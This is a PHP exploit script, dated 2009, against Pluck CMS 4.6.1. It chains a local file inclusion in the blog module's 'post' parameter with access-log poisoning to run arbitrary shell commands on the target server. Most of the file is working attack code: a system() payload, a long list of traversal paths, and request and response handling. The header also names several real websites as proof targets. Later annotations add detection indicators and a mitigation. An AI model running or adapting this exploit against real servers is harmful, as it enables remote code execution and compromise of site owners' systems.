
# Title : Pluck CMS 4.6.1 (module_pages_site.php post) LFI Exploit
# Published : 2009-03-23
# Author : Alfons Luja


<?php 

/*
 pluck v 4.6.1 LFI exploit
 author : Alfons Luja
 Vuln is in data/modules/blog/module_pages_site.php 

  ...

      $includepage = 'blog_include.php';
      //Only set 'view post'-page if a post has been specified
      if (isset($_GET['post'])) {
	//Check if post exists, and include information
	   if (file_exists('data/settings/modules/blog/posts/'.$_GET['post'])) {
		include('data/settings/modules/blog/posts/'.$_GET['post']);
		$module_page['viewpost'] = $post_title;
	   }
      }
 ...

 Nothing to comment ;x
 Greetings: For all friends and obvious for me ;D

 pr00f: 
 http://www.kilgarvangaa.com//data/modules/blog/module_pages_site.php?post=../../../../../../../../../../bin/ls
 http://www.southtrewlogcabins.co.uk/data/modules/blog/module_pages_site.php?post=../../../../../../../../../../bin/ls
 http://www.seanhood.co.uk/data/modules/blog/module_pages_site.php?post=../../../../../../../../../../bin/ls
*/  
 

// Usage guard: exits unless at least three CLI arguments were given.
// NOTE(review): only $argc >= 4 is checked, yet $argv[4] is read below, so
// the fourth value may be unset at that point.
if($argc < 4) die("Use host path command [www.penatgon.gov /pluck ls l]n");

// No execution time limit, and every PHP warning/notice is suppressed — the
// undefined-variable and failed-connection conditions in the functions
// below are therefore silent.
set_time_limit(0);
error_reporting(0);

// Positional CLI arguments: target host, TCP port, application path under
// the web root, and the command string that $shell[0] interpolates.
$host = $argv[1];
$port = $argv[2];
$path = $argv[3];
$command = $argv[4];

//add something if not w00rking ;x
//
// $shell[0] is a PHP snippet; because the string is double-quoted, $command
// (argv[4]) is interpolated into it here. It is wrapped in the two marker
// strings ' e[Ho_trip ' and ' d34th_trip' that _result() later splits on.
// $shell[1..] are candidate relative paths to a web server access log, each
// location repeated at increasing '../' depths. _inject() sends $shell[0]
// in a request line (presumably so the server records it in its access log)
// and _exploit() then tries each of $shell[1..] as the 'post' parameter.
//
// Defender notes: the two marker strings, the fixed User-Agent in _hdr(),
// and a 'post=' value containing '../' are all distinctive indicators of
// this tool in access logs or a WAF. The underlying weakness is that
// module_pages_site.php include()s 'data/settings/modules/blog/posts/' .
// $_GET['post'] without validation (see the header comment); restricting
// 'post' to the basename of a known post removes the path traversal.
$shell = array(  
         "<?php echo(' e[Ho_trip ');system('$command');echo(' d34th_trip'); ?>",
         "../apache/logs/access.log",
         "../../apache/logs/access.log",
         "../../../apache/logs/access.log",
         "../../../../apache/logs/access.log",
         "../../../../../apache/logs/access.log",
         "../../../../../../apache/logs/access.log",
         "../../../../../../../apache/logs/access.log",
         "../../../../../../../../apache/logs/access.log",
         "../../../../../../../../../apache/logs/access.log",
         "../../../../../../../../../../apache/logs/access.log",
         "../../../../../../../../../../../apache/logs/access.log",
         "../var/log/httpd/access.log",
         "../../var/log/httpd/access.log",
         "../../../var/log/httpd/access.log",
         "../../../../var/log/httpd/access.log",
         "../../../../../var/log/httpd/access.log",
         "../../../../../../var/log/httpd/access.log",
         "../../../../../../../var/log/httpd/access.log",
         "../../../../../../../../var/log/httpd/access.log",
         "../../../../../../../../../var/log/httpd/access.log",
         "../../../../../../../../../../var/log/httpd/access.log",
         "../../../../../../../../../../../var/log/httpd/access.log",
         "../var/log/apache/access.log",
         "../../var/log/apache/access.log",
         "../../../var/log/apache/access.log",
         "../../../../var/log/apache/access.log",
         "../../../../../var/log/apache/access.log",
         "../../../../../../var/log/apache/access.log",
         "../../../../../../../var/log/apache/access.log",
         "../../../../../../../../var/log/apache/access.log",
         "../../../../../../../../../var/log/apache/access.log",
         "../../../../../../../../../../var/log/apache/access.log",
         "../../../../../../../../../../../var/log/apache/access.log",
         "../usr/local/apache2/logs/access.log",
         "../../usr/local/apache2/logs/access.log",
         "../../../usr/local/apache2/logs/access.log",
         "../../../../usr/local/apache2/logs/access.log",
         "../../../../../usr/local/apache2/logs/access.log",
         "../../../../../../usr/local/apache2/logs/access.log",
         "../../../../../../../usr/local/apache2/logs/access.log",
         "../../../../../../../../usr/local/apache2/logs/access.log",
         "../../../../../../../../../usr/local/apache2/logs/access.log",
         "../../../../../../../../../../usr/local/apache2/logs/access.log",
         "../../../../../../../../../../../usr/local/apache2/logs/access.log", 
   );
/**
 * Build a raw HTTP/1.1 GET request whose request path embeds $shell[$int].
 *
 * Reads the globals $shell, $host and $path. $header is appended to without
 * being initialised first (silent under error_reporting(0)). _inject() calls
 * this with $int = 0, i.e. the PHP payload string is placed in the request
 * line.
 *
 * Detection: the fixed User-Agent '_echo [ru] (Win6.66; @)' and a request
 * URI containing '<?php' are both easy to match in access logs.
 *
 * @param int $int index into $shell
 * @return string the assembled request text
 */
function _hdr($int){   // original note (mis-encoded Polish), roughly: "was supposed to be done without file_get_contents"
       
        global $shell,$host,$path;
        $header .= "GET /$host/$path/$shell[$int]  HTTP/1.1rn";
        $header .= "Host: $hostrn";
        $header .= "User-Agent: _echo [ru] (Win6.66; @)rn";
        $header .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn";
        $header .= "Accept-Language: en-us,en;q=0.5rn";
        $header .= "Accept-Encoding: gzip,deflatern";
        $header .= "Connection: closernrn";
        return $header;


}


/**
 * Open a TCP connection to $hosts:$ports (30 s timeout), write the request
 * returned by _hdr(0) — the one carrying $shell[0] — and close the socket
 * without reading any response. die()s if fsockopen() fails.
 *
 * @param string     $hosts target host
 * @param int|string $ports target port
 * @return void
 */
function _inject($hosts,$ports){
    
           $hnd = fsockopen($hosts,$ports,$errno, $errstr, 30);
           if(!$hnd) die("Injection errr $errstrn");
           fwrite($hnd,_hdr(0));
           fclose($hnd);  


}

/**
 * Scan a fetched page body for text bracketed by the markers ' e[Ho_trip '
 * and ' d34th_trip' (the strings $shell[0] prints around the command output).
 *
 * Splits $data on the start marker. If anything follows the first marker,
 * iterates the remaining pieces but acts only on the LAST one
 * ($i - count($ret) == -1): the text before the end marker is echoed, or
 * the script die()s with an "Exploit failed!!" message if that text is
 * empty. Earlier pieces are ignored. When the start marker is absent
 * (or $data is false from a failed fetch), $ret[1] is undefined — notice
 * suppressed — and the function returns silently.
 *
 * @param string|false $data HTTP response body as returned by file_get_contents()
 * @return void
 */
function _result($data){
 
          $ret = explode(' e[Ho_trip ',$data); 
            if($ret[1] != ""){
              for($i = 1;$i<count($ret);$i++){
               $ret_2 = explode(' d34th_trip',$ret[$i]);  
                   if($i - count($ret) == -1){
                     if($ret_2[0] != ""){
                        echo($ret_2[0]);
                     } else {
                        die("Exploit failed!!n");
                     }
               } 
              }    
               
            }

}

/**
 * For each candidate log path in $shell[1..] (index 0, the payload, is
 * skipped), request the vulnerable page with that path as the 'post' query
 * parameter via file_get_contents() and pass the body to _result().
 * Reads the global $shell. $rets is assigned but never used.
 *
 * The URL requested here is the include() sink quoted in the header
 * comment. A failed fetch yields false, which _result() ignores.
 *
 * Mitigation (for the application): reject any 'post' value that is not
 * the basename of an existing post — e.g. compare it against a directory
 * listing of the posts folder — instead of passing $_GET['post'] straight
 * to file_exists()/include().
 *
 * @param string $hosts target host
 * @param string $paths application path under the web root
 * @return void
 */
function _exploit($hosts,$paths){

        global $shell;
        $rets = "";
        $count = count($shell);

        for($i=1;$i<$count;$i++){
            
            $tab = file_get_contents("http://".$hosts."/".$paths."/data/modules/blog/module_pages_site.php?post=$shell[$i]");
           _result($tab);
  
        }
 
         
}
// Banner: prints the tool name, author and the parsed arguments, then runs
// the two phases in order — _inject() (sends $shell[0] to the server) and
// _exploit() (tries each log path in $shell[1..] through 'post').
echo("---- pluck v 4.6.1 -----nn".
     "Autor: Alfons Lujan".
     "Target: $hostn".
     "Path: $pathn".
     "Port: $portn".
     "COM: $commandn".
     "Ex: poc.php www.target.com 80 pluck "dir"nn");

    _inject($host,$port);
    _exploit($host,$path);

?>
